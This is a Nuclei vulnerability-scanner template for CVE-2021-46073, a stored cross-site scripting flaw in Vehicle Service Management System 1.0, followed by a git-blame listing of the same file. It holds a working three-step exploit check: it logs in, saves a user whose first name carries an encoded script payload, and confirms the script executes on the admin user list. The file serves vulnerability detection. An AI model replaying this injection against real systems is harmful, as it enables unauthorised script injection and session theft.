nuclei-templates/http/cves/2021/CVE-2021-46073.yaml

id: CVE-2021-46073

info:
  name: Vehicle Service Management System 1.0 - Cross Site Scripting
  author: TenBird
  severity: medium
  description: |
    Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS
    - https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss
    - https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46073
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.8
    cve-id: CVE-2021-46073
    cwe-id: CWE-79
    epss-score: 0.0011
    epss-percentile: 0.4404
    cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: vehicle_service_management_system_project
    product: vehicle_service_management_system
  tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project

http:
  - raw:
      - |
        POST /vehicle_service/classes/Login.php?f=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}
      - |
        POST /vehicle_service/classes/Users.php?f=save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1
      - |
        GET /vehicle_service/admin/?page=user/list HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header_3, 'text/html')"
          - "status_code_3 == 200"
          - 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'
        condition: and
# digest: 4b0a00483046022100a96d3af0aac3b22cd69738643941944444daba57a4d989ce5bad7797f69df3bd022100d25c9a88345d256148db9c2175d9f6a21773358cac529a6971408ffd89bd2bfd:922c64590222798bb761d5b6d8e72950
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST 2022-09-08 13:28:46 +00:00			`id: CVE-2021-46073`

Auto Generated CVE annotations [Thu Sep 1 17:35:22 UTC 2022] :robot: 2022-09-01 17:35:22 +00:00			`info:`
Dashboard Merge Issues Resolution (#5337) * Auto Generated CVE annotations [Wed Sep 7 15:59:37 UTC 2022] :robot: * Fixed merge issues from previous PR * moved vulnerabilities/wordpress/CVE-2019-10692.yaml to cves dir * Fix CVSS information and other minor merge issues Co-authored-by: Sullo <sullo@cirt.net> 2022-09-10 01:55:52 +00:00			`name: Vehicle Service Management System 1.0 - Cross Site Scripting`
Auto Generated CVE annotations [Thu Sep 1 17:35:22 UTC 2022] :robot: 2022-09-01 17:35:22 +00:00			`author: TenBird`
Auto Generated CVE annotations [Sat Sep 10 02:12:57 UTC 2022] :robot: 2022-09-10 02:12:57 +00:00			`severity: medium`
Auto Generated CVE annotations [Thu Sep 1 17:35:22 UTC 2022] :robot: 2022-09-01 17:35:22 +00:00			`description: \|`
Dashboard Merge Issues Resolution (#5337) * Auto Generated CVE annotations [Wed Sep 7 15:59:37 UTC 2022] :robot: * Fixed merge issues from previous PR * moved vulnerabilities/wordpress/CVE-2019-10692.yaml to cves dir * Fix CVSS information and other minor merge issues Co-authored-by: Sullo <sullo@cirt.net> 2022-09-10 01:55:52 +00:00			`Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected application.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
updated 2020 CVEs 2023-09-06 12:22:36 +00:00			`Upgrade to the latest version to mitigate this vulnerability.`
Auto Generated CVE annotations [Thu Sep 1 17:35:22 UTC 2022] :robot: 2022-09-01 17:35:22 +00:00			`reference:`
			`- https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS`
			`- https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss`
			`- https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-46073`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/SYRTI/POC_to_review`
Auto Generated CVE annotations [Thu Sep 1 17:35:22 UTC 2022] :robot: 2022-09-01 17:35:22 +00:00			`classification:`
Auto Generated CVE annotations [Sat Sep 10 02:12:57 UTC 2022] :robot: 2022-09-10 02:12:57 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 4.8`
Dashboard Merge Issues Resolution (#5337) * Auto Generated CVE annotations [Wed Sep 7 15:59:37 UTC 2022] :robot: * Fixed merge issues from previous PR * moved vulnerabilities/wordpress/CVE-2019-10692.yaml to cves dir * Fix CVSS information and other minor merge issues Co-authored-by: Sullo <sullo@cirt.net> 2022-09-10 01:55:52 +00:00			`cve-id: CVE-2021-46073`
Auto Generated CVE annotations [Sat Sep 10 02:12:57 UTC 2022] :robot: 2022-09-10 02:12:57 +00:00			`cwe-id: CWE-79`
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot: 2024-06-07 10:04:29 +00:00			`epss-score: 0.0011`
			`epss-percentile: 0.4404`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:vehicle_service_management_system_project:vehicle_service_management_system::::::::`
Auto Generated CVE annotations [Thu Sep 1 17:35:22 UTC 2022] :robot: 2022-09-01 17:35:22 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`max-request: 3`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: vehicle_service_management_system_project`
			`product: vehicle_service_management_system`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,xss,vms,authenticated,vehicle_service_management_system_project`
Dashboard Merge Issues Resolution (#5337) * Auto Generated CVE annotations [Wed Sep 7 15:59:37 UTC 2022] :robot: * Fixed merge issues from previous PR * moved vulnerabilities/wordpress/CVE-2019-10692.yaml to cves dir * Fix CVSS information and other minor merge issues Co-authored-by: Sullo <sullo@cirt.net> 2022-09-10 01:55:52 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST 2022-09-08 13:28:46 +00:00			`- raw:`
			`- \|`
			`POST /vehicle_service/classes/Login.php?f=login HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`username={{username}}&password={{password}}`
			`- \|`
			`POST /vehicle_service/classes/Users.php?f=save HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`firstname=test1%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=test&username=test&password=test&type=1`
			`- \|`
			`GET /vehicle_service/admin/?page=user/list HTTP/1.1`
			`Host: {{Hostname}}`

Using "host-redirects" instead of "redirects" to avoid scanning 3rd party / out of scope hosts. (#5491) 2022-10-07 21:27:25 +00:00			`host-redirects: true`
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST 2022-09-08 13:28:46 +00:00			`max-redirects: 2`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST 2022-09-08 13:28:46 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
removed deprecated header syntax with latest one 2023-06-19 21:10:30 +00:00			`- "contains(header_3, 'text/html')"`
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST 2022-09-08 13:28:46 +00:00			`- "status_code_3 == 200"`
			`- 'contains(body_3, "<script>alert(document.domain)</script> Test</td>")'`
			`condition: and`
Auto Template Signing [Sat Jun 8 16:02:16 UTC 2024] :robot: 2024-06-08 16:02:17 +00:00			`# digest: 4b0a00483046022100a96d3af0aac3b22cd69738643941944444daba57a4d989ce5bad7797f69df3bd022100d25c9a88345d256148db9c2175d9f6a21773358cac529a6971408ffd89bd2bfd:922c64590222798bb761d5b6d8e72950`